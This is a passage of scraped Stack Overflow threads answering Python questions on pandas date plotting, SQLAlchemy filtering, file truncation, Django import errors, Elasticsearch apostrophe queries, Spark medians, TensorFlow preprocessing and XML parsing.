end_date = '2015-01-31'
â
dates = date
times = time
â
days = [date_to_days(d) for d in dates]
hours = [time_to_hours(t) for t in times]
â
plt.plot_date(days, hours, ydate=False)
plt.axis([date_to_days(start_date), date_to_days(end_date), 0, 24])
plt.xlabel('Date')
plt.ylabel('Time (hours)')
plt.show()
</code></pre>
| 1 | 2016-08-03T12:02:00Z | 38,743,431 | <p>The problem seems to be that you assume <code>df['Date']</code> is a string column and you're trying to convert it to date with <code>[date_to_days(d) for d in dates]</code>, but since you read the file with the <code>parse_dates=[0]</code> option, pandas already parsed it.</p>
| 0 | 2016-08-03T12:17:06Z | [
"python"
] |
Pandas Converter on Data strptime() | 38,743,079 | <p>I am trying to plot this points, however I am getting that error. Do I need another converter for the date data? The x-axis should be the date, and y axis should be the time value. Thank you.</p>
<p>TypeError: strptime() argument 1 must be str, not Timestamp</p>
<pre><code>df = pd.read_csv('file.csv', sep=',', parse_dates=[0], header=None,
names=['Date', 'Time'])
print (df.head())
Date Time
0 2015-01-02 02:29:45 PM
1 2015-01-02 05:16:15 PM
2 2015-01-02 05:48:46 PM
3 2015-01-02 03:18:34 PM
4 2015-01-02 05:22:55 PM
In [5]:
date = df['Date']
time = df['Time']
from matplotlib import pyplot as plt
from matplotlib.dates import date2num
â
â
def date_to_days(date):
return date2num(datetime.datetime.strptime(date,'%Y-%m-%d'))
â
â
def time_to_hours(time):
[hh, mm, ss] = [int(x) for x in time.split(':')]
seconds = datetime.timedelta(hours=hh, minutes=mm, seconds=ss).seconds
hours = seconds / float(3600)
return hours
â
if __name__ == '__main__':
start_date = '2015-01-01'
end_date = '2015-01-31'
â
dates = date
times = time
â
days = [date_to_days(d) for d in dates]
hours = [time_to_hours(t) for t in times]
â
plt.plot_date(days, hours, ydate=False)
plt.axis([date_to_days(start_date), date_to_days(end_date), 0, 24])
plt.xlabel('Date')
plt.ylabel('Time (hours)')
plt.show()
</code></pre>
| 1 | 2016-08-03T12:02:00Z | 38,743,457 | <p><code>datetime.strptime()</code> is for <em>parsing</em> strings into <code>datetime.datetime</code> objects. As such it makes no sense to apply it to a <code>pandas.tslib.Timestamp</code> object, which is what would be passed in by <code>[date_to_days(d) for d in dates]</code> because <code>dates</code> contains those objects.</p>
<p>It should be possible to pass the pandas timestamp directly to <code>date2num()</code>:</p>
<pre><code>def date_to_days(date):
return date2num(date)
>>> days = [date_to_days(d) for d in dates]
>>> days
[735600.0, 735600.0, 735600.0, 735600.0, 735600.0]
</code></pre>
<p>Later in your code you want to call <code>date2num()</code> on date strings, however, you could simply define them upfront as <code>datetime</code> objects so as to avoid parsing the strings:</p>
<pre><code>start_date = datetime.datetime(2015, 1, 1)
end_date = datetime.datetime(2015, 1, 31)
</code></pre>
<p>and this will work with the revised function that I show above; in fact the <code>date_to_days()</code> function is no longer required.... just call <code>date2num()</code> directly:</p>
<pre><code>days = [date2num(d) for d in dates]
</code></pre>
<p>and</p>
<pre><code>plt.axis([date2num(start_date), date2num(end_date), 0, 24])
</code></pre>
| 0 | 2016-08-03T12:18:09Z | [
"python"
] |
why use sqlalchemy declarative api? | 38,743,100 | <p>New to sqlalchemy and somewhat novice with programing and python. I had wanted to query a table. It seems I can use the all() function when querying but cannot filter without creating a class.</p>
<p>1.) Can I filter without creating a class and using the declarative api? Is the filtering example stated below incorrect?
2.) When would it be appropriate to use declarative api in sqlalchemy and when would it not be appropriate?</p>
<pre><code>import sqlalchemy as sql
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import sessionmaker
db = sql.create_engine('postgresql://postgres:password@localhost:5432/postgres')
engine = db.connect()
meta = MetaData(engine)
session = sessionmaker(bind=engine)
session = session()
files = Table('files',meta,
Column('file_id',Integer,primary_key=True),
Column('file_name',String(256)),
Column('query',String(256)),
Column('results',Integer),
Column('totalresults',Integer),
schema='indeed')
session.query(files).all() #ok
session.query(files).filter(files.file_name = 'test.json') #not ok
</code></pre>
| 0 | 2016-08-03T12:02:39Z | 38,743,594 | <p>Filter using declarative api this way:</p>
<pre><code>session.query(files).filter(files.file_name == 'test.json').all()
</code></pre>
<p>You can also use raw sql queries (<a href="http://docs.sqlalchemy.org/en/latest/core/connections.html#basic-usage" rel="nofollow">docs</a>).</p>
<p>Whether using declarative api or not may depend on your queries complexity, because sometimes sqlalchemy doesn't optimize them right way.</p>
| 1 | 2016-08-03T12:24:42Z | [
"python",
"postgresql",
"sqlalchemy"
] |
why use sqlalchemy declarative api? | 38,743,100 | <p>New to sqlalchemy and somewhat novice with programing and python. I had wanted to query a table. It seems I can use the all() function when querying but cannot filter without creating a class.</p>
<p>1.) Can I filter without creating a class and using the declarative api? Is the filtering example stated below incorrect?
2.) When would it be appropriate to use declarative api in sqlalchemy and when would it not be appropriate?</p>
<pre><code>import sqlalchemy as sql
from sqlalchemy import Table, Column, Integer, String, MetaData, ForeignKey
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import sessionmaker
db = sql.create_engine('postgresql://postgres:password@localhost:5432/postgres')
engine = db.connect()
meta = MetaData(engine)
session = sessionmaker(bind=engine)
session = session()
files = Table('files',meta,
Column('file_id',Integer,primary_key=True),
Column('file_name',String(256)),
Column('query',String(256)),
Column('results',Integer),
Column('totalresults',Integer),
schema='indeed')
session.query(files).all() #ok
session.query(files).filter(files.file_name = 'test.json') #not ok
</code></pre>
| 0 | 2016-08-03T12:02:39Z | 38,750,610 | <p>If you want to filter by a <code>Table</code> construct, it should be:</p>
<pre><code>session.query(files).filter(files.c.file_name == 'test.json')
</code></pre>
<p>You need to create mapped classes if you want to use the ORM features of SQLAlchemy. For example, with the code you currently have, in order to do an update you have to do</p>
<pre><code>session.execute(files.update().values(...))
</code></pre>
<p>As opposed to:</p>
<pre><code>file = session.query(File).first()
file.file_name = "new file name"
session.commit()
</code></pre>
<p>The declarative API happens to be the easiest way of constructing mapped classes, so use it if you want to use the ORM.</p>
| 1 | 2016-08-03T17:56:27Z | [
"python",
"postgresql",
"sqlalchemy"
] |
My code with truncate() appends new data instead of replacing old data | 38,743,152 | <p>This code below is supposed to delete the content of the file and write the new strings that user enters through terminal, but in reality it only appends new line to what is already there. I can't seem to make it fully erase the content with <code>truncate()</code>. How do I do this?</p>
<p><strong>Note</strong>: it has to be done with <code>truncate()</code> as it's an exercise from the book and I don't want to jump into the future and use any more advanced stuff.
Thanks!</p>
<pre><code>from sys import argv
script, filename, user_name = argv
print("Hi my dear %s... I hope you're doing great today\n" % user_name)
print("We're going to write a string to a file %r\n" % filename)
open_file = open(filename, 'r+')
print("%s, this is what currently file %r has" % (user_name, filename))
read_file = open_file.read()
print("File's content is:\n", read_file)
quote = "To create, first sometime you need to destroy"
print("\n\nAs a quote from your favourite movie says: \n\n %r" \
% quote)
print("So, we will delete the content from the file %r" \
% filename)
open_file.truncate()
print("This is the file %r now" % filename)
print(read_file)
new_line = input("Now let's write something, please start here... ")
print("now %s, let's add this line to the same file %r" \
% (user_name, filename))
open_file.write(new_line)
print("Closing the file")
open_file.close()
print(read_file)
open_file.close()
</code></pre>
| 0 | 2016-08-03T12:04:38Z | 38,743,210 | <p><a href="https://docs.python.org/3/library/io.html#io.IOBase.truncate" rel="nofollow"><code>truncate()</code></a> without any arguments truncates at the current position. Pass a size to make it truncate the file to that size.</p>
| 2 | 2016-08-03T12:07:04Z | [
"python",
"python-3.x"
] |
My code with truncate() appends new data instead of replacing old data | 38,743,152 | <p>This code below is supposed to delete the content of the file and write the new strings that user enters through terminal, but in reality it only appends new line to what is already there. I can't seem to make it fully erase the content with <code>truncate()</code>. How do I do this?</p>
<p><strong>Note</strong>: it has to be done with <code>truncate()</code> as it's an exercise from the book and I don't want to jump into the future and use any more advanced stuff.
Thanks!</p>
<pre><code>from sys import argv
script, filename, user_name = argv
print("Hi my dear %s... I hope you're doing great today\n" % user_name)
print("We're going to write a string to a file %r\n" % filename)
open_file = open(filename, 'r+')
print("%s, this is what currently file %r has" % (user_name, filename))
read_file = open_file.read()
print("File's content is:\n", read_file)
quote = "To create, first sometime you need to destroy"
print("\n\nAs a quote from your favourite movie says: \n\n %r" \
% quote)
print("So, we will delete the content from the file %r" \
% filename)
open_file.truncate()
print("This is the file %r now" % filename)
print(read_file)
new_line = input("Now let's write something, please start here... ")
print("now %s, let's add this line to the same file %r" \
% (user_name, filename))
open_file.write(new_line)
print("Closing the file")
open_file.close()
print(read_file)
open_file.close()
</code></pre>
| 0 | 2016-08-03T12:04:38Z | 38,743,218 | <p>The <a href="https://docs.python.org/2/library/stdtypes.html#file.truncate" rel="nofollow"><code>truncate</code></a> method has an optional <code>size</code> argument which defaults to the current position of the file pointer. Since you've already called <code>read</code> on the file, <code>truncate</code> isn't doing anything as the current position is the end of the file. </p>
<p>Change your call to <code>truncate(0)</code> and it'll clear the file. </p>
| 1 | 2016-08-03T12:07:22Z | [
"python",
"python-3.x"
] |
django.core.validators is not a package | 38,743,262 | <p>I've been struggling with this issue for a couple of days and still can't figure out why this is happening.
I'm trying to at least access a shell via manage.py or perform a migration.
(django 1.9.8, python 3.5.2)</p>
<pre><code> Traceback (most recent call last):
File "gris/gris/manage.py", line 14, in <module>
execute_from_command_line(sys.argv)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 353, in execute_from_command_line
utility.execute()
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 345, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 195, in fetch_command
klass = load_command_class(app_name, subcommand)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 39, in load_command_class
module = import_module('%s.management.commands.%s' % (app_name, name))
File "/home/user/Python-3.5.2/Lib/importlib/__init__.py", line 126, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 944, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 222, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 944, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 222, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ImportError: No module named 'django.core.validators.management'; 'django.core.validators' is not a package
</code></pre>
<p>I'm trying to run the script from inside the virtual environment. The weird part is: everything works on MacOS machines and PyCharm is able to run the server.</p>
<p>What have i tried so far:</p>
<ol>
<li>Made sure i'm using the correct version of python and django.</li>
<li>Took manage.py from a freshly created project and replaced</li>
<li>Grep'ed the filesystem for 'django.core.validators'</li>
<li>Downloaded Python sources, compiled them locally and created new virtual environment</li>
<li>Tried running it without virtual environment</li>
<li>Tried different django(1.9.0, 1.9.6, 1.9.5) and python(3.4, 3.5.2) versions</li>
</ol>
<p>I ran out of ideas what could cause that. Django.core.validators is not a package, it's a .py file and apparently there's no code trying to access in differently.</p>
<p>Any ideas/suggestions?</p>
<p>My project structure: <a href="http://i.stack.imgur.com/W7YV1.png" rel="nofollow"><img src="http://i.stack.imgur.com/W7YV1.png" alt="my_project_structure"></a></p>
| 0 | 2016-08-03T12:09:16Z | 38,743,444 | <p>According to the <a href="https://docs.djangoproject.com/en/1.9/ref/validators/" rel="nofollow">Django documentation</a> and indeed the <a href="https://docs.djangoproject.com/en/1.9/_modules/django/core/validators/" rel="nofollow">source code</a> <code>django.core.validators</code> is a module, and does not contain a <code>management</code> attribute.</p>
| 0 | 2016-08-03T12:17:34Z | [
"python",
"django",
"debian",
"importerror"
] |
django.core.validators is not a package | 38,743,262 | <p>I've been struggling with this issue for a couple of days and still can't figure out why this is happening.
I'm trying to at least access a shell via manage.py or perform a migration.
(django 1.9.8, python 3.5.2)</p>
<pre><code> Traceback (most recent call last):
File "gris/gris/manage.py", line 14, in <module>
execute_from_command_line(sys.argv)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 353, in execute_from_command_line
utility.execute()
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 345, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 195, in fetch_command
klass = load_command_class(app_name, subcommand)
File "/home/user/myenv/lib/python3.5/site-packages/django/core/management/__init__.py", line 39, in load_command_class
module = import_module('%s.management.commands.%s' % (app_name, name))
File "/home/user/Python-3.5.2/Lib/importlib/__init__.py", line 126, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 944, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 222, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 944, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 222, in _call_with_frames_removed
File "<frozen importlib._bootstrap>", line 986, in _gcd_import
File "<frozen importlib._bootstrap>", line 969, in _find_and_load
File "<frozen importlib._bootstrap>", line 953, in _find_and_load_unlocked
ImportError: No module named 'django.core.validators.management'; 'django.core.validators' is not a package
</code></pre>
<p>I'm trying to run the script from inside the virtual environment. The weird part is: everything works on MacOS machines and PyCharm is able to run the server.</p>
<p>What have i tried so far:</p>
<ol>
<li>Made sure i'm using the correct version of python and django.</li>
<li>Took manage.py from a freshly created project and replaced</li>
<li>Grep'ed the filesystem for 'django.core.validators'</li>
<li>Downloaded Python sources, compiled them locally and created new virtual environment</li>
<li>Tried running it without virtual environment</li>
<li>Tried different django(1.9.0, 1.9.6, 1.9.5) and python(3.4, 3.5.2) versions</li>
</ol>
<p>I ran out of ideas what could cause that. Django.core.validators is not a package, it's a .py file and apparently there's no code trying to access in differently.</p>
<p>Any ideas/suggestions?</p>
<p>My project structure: <a href="http://i.stack.imgur.com/W7YV1.png" rel="nofollow"><img src="http://i.stack.imgur.com/W7YV1.png" alt="my_project_structure"></a></p>
| 0 | 2016-08-03T12:09:16Z | 38,743,608 | <p>That error would perhaps be raised if <code>django.core.validators</code> was in your <code>INSTALLED_APPS</code> setting. </p>
<p>If it is in your <code>INSTALLED_APPS</code> setting, then it shouldn't be there because it's not an app. Remove it.</p>
| 1 | 2016-08-03T12:25:14Z | [
"python",
"django",
"debian",
"importerror"
] |
Elastic doesn't find the word with the apostrophe (') | 38,743,274 | <p>I try to find the sentence that consists the word with the apostrophe. So, in the text </p>
<blockquote>
<p>If you ask foreigners to name some typically English dishes, they
will probably say fish and chips and then stop. It is disappointing,
but true, that there is no tradition in Britain of eating in
restaurants, because our food doesn't lend itself to such preparation.
British cooking is found in the home, where it is possible to time the
dishes to perfection. So it is difficult to find a good English
restaurant with reasonable prices</p>
</blockquote>
<p>I try to find</p>
<blockquote>
<p>find it is disappointing, but true, that there is no tradition in
britain of eating in restaurants, because our food doesn't</p>
</blockquote>
<p>I create the query</p>
<pre><code>{
"_index": "liza_index",
"_type": ".percolator",
"_id": "1594",
"_version": 37,
"found": true,
"_source": {
"query": {
"bool": {
"minimum_should_match": 1,
"should": {
"span_or": {
"clauses": [{
"span_near": {
"in_order": true,
"clauses": [{
"span_multi": {
"match": {
"regexp": {
"message": "it"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "is"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "disappointing"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "but"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "true"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "that"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "there"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "is"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "no"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "tradition"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "in"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "britain"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "of"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "eating"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "in"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "restaurants"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "because"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "our"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "food"
}
}
}
}, {
"span_multi": {
"match": {
"regexp": {
"message": "doesn't"
}
}
}
}],
"slop": 0,
"collect_payloads": false
}
}]
}
}
}
}
}}
</code></pre>
<p>But the Elastic doesn't find it. Without the "doesn't" the query works.</p>
<p>I tried to add the backslash before the apostrophe - "doesn\'t" isn't valid, so I made "doesn\\'t" and "doesn\\\\'t". But it doesn't work.</p>
<p>By the way, I create the query with the one word "doesn't" with the backslashes and without</p>
<pre><code>{
"_index": "liza_index",
"_type": ".percolator",
"_id": "2101",
"_version": 31,
"found": true,
"_source": {
"query": {
"bool": {
"minimum_should_match": 1,
"should": {
"span_or": {
"clauses": [{
"span_multi": {
"match": {
"regexp": {
"message": "doesn't"
}
}
}
}]
}
}
}
}
}}
</code></pre>
<p>And it doesn't work too. At the same time the following queries work</p>
<pre><code>curl -XPUT 'localhost:9200/liza_index/.percolator/1' -d '{"query" : {"match" : {"message" : "doesn't"}}}'
</code></pre>
<p>and</p>
<pre><code>curl -XPUT 'localhost:9200/liza_index/.percolator/1' -d '{"query" : {"match" : {"message" : "doesn\\'t"}}}'
</code></pre>
<p>The question is: how can I find the word with the apostrophe? What kind of query should I create using the structure of the my first query?</p>
| 1 | 2016-08-03T12:09:44Z | 38,745,845 | <blockquote>
<p>âThe hardest thing of all is to find a black cat in a dark room,
especially if there is no cat.â</p>
<p>â Confucius</p>
</blockquote>
<p>Elasticsearch perform <a href="https://www.elastic.co/guide/en/elasticsearch/guide/current/analysis-intro.html#_built_in_analyzers" rel="nofollow">standard analysis and curation</a> of data it receives. It removes most punctuation. If you use <strong>match</strong> query you will pass your query through same curation process and it will work (all punctuation from query will be removed). Regexp queries are not curated. That is why it can not find apostrophe.</p>
<p>Instead of generating complex regexp queries you could use <strong><a href="https://www.elastic.co/guide/en/elasticsearch/guide/current/phrase-matching.html" rel="nofollow">match_phrase</a></strong></p>
<pre><code>curl -XPOST "http://esarchive.local:9200/liza_index/.percolator/_search" -d'
{
"query": {
"match_phrase": {
"message": "find it is disappointing, but true, that there is no tradition in britain of eating in restaurants, because our food doesn\"t"
}
}
}'
</code></pre>
<p>or create custom analyser/mapper to preserve puctuation</p>
| 0 | 2016-08-03T14:02:03Z | [
"python",
"elasticsearch"
] |
A better code to make an empty square with using numbers | 38,743,349 | <p>hi i want to make an empty square with numbers and i have the code like this:</p>
<pre><code>L = input ('input your numbers = ')
M = (L-2) * ' '
P = L - 1
x = ""
y = ""
for a in range(1,L+1):
x = x + str(a)
print x
for b in range(2,L):
print str(b) + M + str(P)
P-=1
for c in range(L,0,-1):
y = y + str(c)
print y
</code></pre>
<p>i just want to know if you guys can help me with the better code.. idk i just feel not satisfied enough with my code.. maybe you can give me an alternative ways (add some condition or maybe create increment and decrement number only use 1 function ?)
btw this is the first time to ask in here hehe</p>
<p>thx</p>
| 0 | 2016-08-03T12:13:28Z | 38,743,894 | <p>Not exactly the same output as yours (due to <code>print</code> placing space after each digit), but example how to accomplish the same by detecting edge and calculating value:</p>
<pre><code>n = input('> ')
m = n-1
for i in range(n):
for j in range(n):
if i == 0 or j == 0: # top or left edge
print 1+i+j,
elif i == m or j == m: # right or bottom edge
print 2*n-1-i-j ,
else: # inside
print ' ',
print
</code></pre>
| 1 | 2016-08-03T12:36:34Z | [
"python",
"python-3.x"
] |
A better code to make an empty square with using numbers | 38,743,349 | <p>hi i want to make an empty square with numbers and i have the code like this:</p>
<pre><code>L = input ('input your numbers = ')
M = (L-2) * ' '
P = L - 1
x = ""
y = ""
for a in range(1,L+1):
x = x + str(a)
print x
for b in range(2,L):
print str(b) + M + str(P)
P-=1
for c in range(L,0,-1):
y = y + str(c)
print y
</code></pre>
<p>i just want to know if you guys can help me with the better code.. idk i just feel not satisfied enough with my code.. maybe you can give me an alternative ways (add some condition or maybe create increment and decrement number only use 1 function ?)
btw this is the first time to ask in here hehe</p>
<p>thx</p>
| 0 | 2016-08-03T12:13:28Z | 38,744,804 | <pre><code>string = map(str,range(1,L+1))
print ''.join(string)
print '\n'.join([ i+M+j for i,j in zip(string[1:-1],string[1:-1][::-1])])
print ''.join(string[::-1])
</code></pre>
| 0 | 2016-08-03T13:17:59Z | [
"python",
"python-3.x"
] |
Best way to create a Day model in Django | 38,743,403 | <p>I want to create an object called Day and in that I want to store other object instances called Meeting.</p>
<p>My question is:
What is the best way to create the object Day with datetime reference. Is there a built in model structure or something that lets me use days as objects or should I simply create the model called Day and give it a variable that is datetime?</p>
<p>Thanks in advance from a noobie <3</p>
| 0 | 2016-08-03T12:15:40Z | 38,743,810 | <p>I would structure your database like this:</p>
<pre><code>class DayModel(models.Model):
date = models.DateField()
class MeetingModel(models.Model):
day = models.ForeignKey(DayModel, related_name="meetings")
time = models.TimeField()
</code></pre>
| 0 | 2016-08-03T12:33:19Z | [
"python",
"django",
"django-models"
] |
How to find the median in Apache Spark with Python Dataframe API? | 38,743,476 | <p>Pyspark API provides many aggregate functions except the median. Spark 2 comes with approxQuantile which gives approximate quantiles but exact median is very expensive to calculate. Is there a more Pyspark way of calculating median for a column of values in a Spark Dataframe?</p>
| 0 | 2016-08-03T12:19:01Z | 38,743,477 | <p>Here is an example implementation with Dataframe API in Python (Spark 1.6 +).</p>
<pre><code>import pyspark.sql.functions as F
import numpy as np
</code></pre>
<p>Let's assume we have monthly salaries for customers in "salaries" spark dataframe such as: </p>
<p><strong>month | customer_id | salary</strong></p>
<p>and we would like to find the median salary per customer throughout all the months</p>
<p>Step1: Write a user defined function to calculate the median</p>
<pre><code>def find_median(values_list):
try:
median = np.median(values_list) #get the median of values in a list in each row
return round(float(median),2)
except Exception:
return None #if there is anything wrong with the given values
median_finder = F.udf(find_median,FloatType())
</code></pre>
<p>Step 2: Aggregate on the salary column by collecting them into a list of salaries in each row:</p>
<pre><code>salaries_list = salaries.groupBy("customer_id").agg(F.collect_list("salary").alias("salaries"))
</code></pre>
<p>Step 3: Call the median_finder udf on the salaries column and add the median values as a new column</p>
<pre><code>salaries_list = salaries_list.withColumn("median",median_finder("salaries"))
</code></pre>
| 0 | 2016-08-03T12:19:01Z | [
"python",
"apache-spark",
"pyspark",
"median"
] |
How to perform mean subtraction and normalization with Tensorflow | 38,743,506 | <p>On <a href="http://cs231n.github.io/neural-networks-2/" rel="nofollow">http://cs231n.github.io/neural-networks-2/</a> it is mentioned that for convolutional neural networks it is preferred to preprocess data using mean subtraction and normalization techniques.</p>
<p>I was just wondering how would it be best approached using Tensorflow.</p>
<p>Mean substraction</p>
<pre><code>X -= np.mean(X)
</code></pre>
<p>Normalization</p>
<pre><code>X /= np.std(X, axis = 0)
</code></pre>
| 0 | 2016-08-03T12:20:49Z | 38,744,527 | <p>You're looking for <a href="https://www.tensorflow.org/versions/master/api_docs/python/image.html#per_image_whitening" rel="nofollow"><code>tf.image.per_image_whitening(image)</code></a>:</p>
<blockquote>
<p>Linearly scales image to have zero mean and unit norm.</p>
<p>This op computes (x - mean) / adjusted_stddev, where mean is the average of all values in image, and adjusted_stddev = max(stddev, 1.0/sqrt(image.NumElements())).</p>
</blockquote>
| 0 | 2016-08-03T13:04:35Z | [
"python",
"tensorflow"
] |
How to perform mean subtraction and normalization with Tensorflow | 38,743,506 | <p>On <a href="http://cs231n.github.io/neural-networks-2/" rel="nofollow">http://cs231n.github.io/neural-networks-2/</a> it is mentioned that for convolutional neural networks it is preferred to preprocess data using mean subtraction and normalization techniques.</p>
<p>I was just wondering how would it be best approached using Tensorflow.</p>
<p>Mean substraction</p>
<pre><code>X -= np.mean(X)
</code></pre>
<p>Normalization</p>
<pre><code>X /= np.std(X, axis = 0)
</code></pre>
| 0 | 2016-08-03T12:20:49Z | 39,831,856 | <p>Looking in the source code for <a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/layers/python/layers/feature_column.py" rel="nofollow">feature columns</a> I noticed for real_valued_column types there is a keyword argument normalizer that can take as an argument a default normalization function to apply to each element of the tensor:</p>
<pre><code>real_valued_column("col_name", normalizer = lambda x: (x-X.mean())/X.std())
</code></pre>
<p>Where X is your data. I think the advantage here is the normalization can be applied in the course of a tensor flow graph on a purpose built machine. Also the normalization function can be easily customized.</p>
| 0 | 2016-10-03T12:36:48Z | [
"python",
"tensorflow"
] |
How to fetch specific rows from a tensor in Tensorflow? | 38,743,538 | <p>I have a tensor defined as follows:</p>
<pre><code>temp_var = tf.Variable(initial_value=np.asarray([[1, 2, 3],[4, 5, 6],[7, 8, 9],[10, 11, 12]]))
</code></pre>
<p>I also have an array of indexes of rows to be fetched from tensor:</p>
<pre><code>idx = tf.constant([0, 2])
</code></pre>
<p>Now I want to take a subset of <code>temp_var</code> at those indexes i.e. <code>idx</code></p>
<p>I know that to take a single index or a slice, we can do something like</p>
<pre><code>temp_var[single_row_index, :]
</code></pre>
<p>or </p>
<pre><code>temp_var[start:end, :]
</code></pre>
<p>But how to fetch rows indicated by <code>idx</code> array?
Something like <code>temp_var[idx, :]</code> ?</p>
| 0 | 2016-08-03T12:22:07Z | 38,746,778 | <p>The <a href="https://www.tensorflow.org/versions/r0.10/api_docs/python/array_ops.html#gather" rel="nofollow"><code>tf.gather()</code></a> op does exactly what you need: it selects rows from a matrix (or in general (N-1)-dimensional slices from an N-dimensional tensor). Here's how it would work in your case:</p>
<pre><code>temp_var = tf.Variable([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]]))
idx = tf.constant([0, 2])
rows = tf.gather(temp_var, idx)
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)
print(sess.run(rows)) # ==> [[1, 2, 3], [7, 8, 9]]
</code></pre>
| 1 | 2016-08-03T14:41:28Z | [
"python",
"tensorflow"
] |
Debug behavior differ from normal execution in python | 38,743,551 | <p>I am trying to figure out why my code behavior differs from normal execution. I have seen this, but it is not my case:</p>
<blockquote>
<p><a href="http://stackoverflow.com/questions/1108246/what-to-do-if-debug-behaviour-differs-from-normal-execution">What to do, if debug behaviour differs from normal execution?</a></p>
<p><a href="http://stackoverflow.com/questions/25379294/python2-7-using-debug-behave-different-then-without-debug">python2.7 using debug behave different then without debug</a></p>
</blockquote>
<p>I'm parsing an XML document to a DataFrame, so I can convert into a csv or excel file. With normal execution, it only parses the last "CPE" of the "LOCALIDADE" node.</p>
<p>This is a chunk of my xml file:</p>
<pre><code><DISTRITO xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<NOME_DISTRITO>BRAGANCA</NOME_DISTRITO>
<CONCELHO>
<NOME_CONCELHO>ALFANDEGA DA FE</NOME_CONCELHO>
<FREGUESIA>
<NOME_FREGUESIA>AGROBOM</NOME_FREGUESIA>
<LOCALIDADE>
<NOME_LOCALIDADE>AGROBOM</NOME_LOCALIDADE>
<CODIGO_POSTAL>5350</CODIGO_POSTAL>
<CPE>PT2000022152377DE</CPE>
<CPE>PT2000022152388XX</CPE>
<CPE>PT2000022152399XK</CPE>
<CPE>PT2000022152402BR</CPE>
<CPE>PT2000022152424NT</CPE>
</LOCALIDADE>
</FREGUESIA>
<FREGUESIA>
<NOME_FREGUESIA>ALFANDEGA DA FE</NOME_FREGUESIA>
<LOCALIDADE>
<NOME_LOCALIDADE>ALFANDEGA DA FE</NOME_LOCALIDADE>
<CODIGO_POSTAL>5350</CODIGO_POSTAL>
<CPE>PT2000022153052QF</CPE>
<CPE>PT2000022153085VV</CPE>
<CPE>PT2000022153108HV</CPE>
<CPE>PT2000022153119LM</CPE>
</LOCALIDADE>
</FREGUESIA>
</CONCELHO>
</DISTRITO>
</code></pre>
<p>This code works for me when I am debugging it:</p>
<pre><code>import xml.etree.ElementTree as et
import pandas as pd
path = '/Path/toFile.xml'
data = []
for (ev,el) in et.iterparse(path):
print (el.tag, el.text)
if el.tag == 'NOME_DISTRITO': nome = el.text
if el.tag == 'NOME_CONCELHO': nc = el.text
if el.tag == 'NOME_FREGUESIA': nf = el.text
if el.tag == 'NOME_LOCALIDADE': nl = el.text
if el.tag == "LOCALIDADE":
inner = {}
inner['NOME_DISTRITO'] = nome
inner['NOME_CONCELHO'] = nc
inner['NOME_FREGUESIA'] = nf
for i in el:
print (i.tag,i.text)
print(data)
inner[i.tag] = i.text
if inner.has_key('CPE'):
data.append(inner)
df = pd.DataFrame(data)
df.to_csv('/Users/DanielMelo/Documents/Endesa/Portugal/CPE.csv',columns=['CPE','NOME_CONCELHO','NOME_FREGUESIA',
'NOME_LOCALIDADE','CODIGO_POSTAL'])
</code></pre>
<p>But this is the result when I run with normal execution:</p>
<pre><code>CPE NOME_CONCELHO NOME_FREGUESIA NOME_LOCALIDADE CODIGO_POSTAL
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
